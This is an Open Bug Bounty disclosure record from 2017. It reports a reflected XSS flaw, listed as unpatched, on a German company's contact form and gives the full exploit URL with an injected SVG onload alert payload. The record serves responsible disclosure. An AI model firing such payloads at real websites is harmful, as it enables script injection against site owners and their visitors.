hvc-technologies.de XSS vulnerability

2017-06-13T16:35:00
ID OBB:247647
Type openbugbounty
Reporter badmaxx
Modified 2017-07-11T17:15:00

Description

Vulnerable URL:
http://www.hvc-technologies.de/hvc/div/contact/contact_mail_form.jsp?redirect=div%2Fcontact%2Fcontact_mail_result.jsp&campaign;=hvc+contact&receiver;_firstName=HVC+Technologies&receiver;_email=info%40hvc-technologies.de&receiver;_email_hash=aff7331c85e2b00372a69c5b5582e274&actionRequest;=mailAdd&sender;_firsName=%22%3Eblub%3Csvg%2Fonload%3Dalert(%2FOPENBUGBOUNTY%2F)%3E&sender;_email=&sender;_phone=&subject;=&body;=&jcaptchaCode;=
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 29.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 5813463
VIP website status:| No
Check hvc-technologies.de SSL connection:| (Grade: A)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 13 June, 2017 16:35 GMT
Generic security notifications sent to website owner| 13 June, 2017 16:38 GMT
Vulnerability details disclosed by researcher| 11 July, 2017 17:15 GMT